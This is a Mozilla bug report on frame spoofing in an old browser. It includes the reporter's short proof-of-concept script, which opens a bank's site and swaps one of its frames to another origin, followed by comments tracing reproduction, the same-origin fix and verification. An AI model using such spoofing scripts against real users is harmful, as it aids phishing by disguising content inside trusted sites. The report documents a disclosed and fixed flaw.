Closed
Bug 20682
Opened 25 years ago
Closed 24 years ago
Frame spoofing #2
Categories
(Core :: Security, defect, P3)
Tracking
()
VERIFIED
FIXED
M17
People
(Reporter: joro, Assigned: security-bugs)
References
()
Details
(Whiteboard: [nsbeta2+])
There is a vulnerability, which allows spoofing frames. The code is: ------------------------------------------ <SCRIPT> b=window.open("http://www.citybank.com"); setTimeout('b.frames[2].location="http://www.mozilla.org";',6000); </SCRIPT> ------------------------------------------ Communicator 4.7 gives security error on this.
Updated•25 years ago
|
Status: NEW → ASSIGNED
Target Milestone: M15
Bulk moving all Browser Security bugs to new Security: General component. The previous Security component for Browser will be deleted.
Component: Security → Security: General
Comment 2•24 years ago
|
||
I don't see signs of progress for M15, and since Norris is out this week, I'm pushing this to M16 (so that we can branch)
Target Milestone: M15 → M16
Updated•24 years ago
|
Target Milestone: M16 → M17
Assignee | ||
Comment 3•24 years ago
|
||
Bulk reassigning most of norris's bugs to mstoltz.
Assignee: norris → mstoltz
Status: ASSIGNED → NEW
Assignee | ||
Comment 6•24 years ago
|
||
I have reproduced this bug. Looks like, for whatever reason, we don't check writing to "location", only reading.
Status: NEW → ASSIGNED
Comment 7•24 years ago
|
||
Assigning QA to czhang
Assignee | ||
Comment 8•24 years ago
|
||
This will be fixed by defaulting to sameOrigin; otherwise, we need to check location.href.write as well as .read.
Group: netscapeconfidential?
Depends on: 28443
Comment 9•24 years ago
|
||
Looks fixed with 7/6 build on NT. Try new testcase: http://rocknroll/users/jtaylor/publish/TestCases/xdomain/frames.html
Assignee | ||
Comment 10•24 years ago
|
||
Fix confirmed by jtaylor. Marking FIXED.
Status: ASSIGNED → RESOLVED
Closed: 24 years ago
Resolution: --- → FIXED
Assignee | ||
Comment 12•24 years ago
|
||
Opening fixed security bugs to the public.
Group: netscapeconfidential?
You need to log in
before you can comment on or make changes to this bug.
Description
•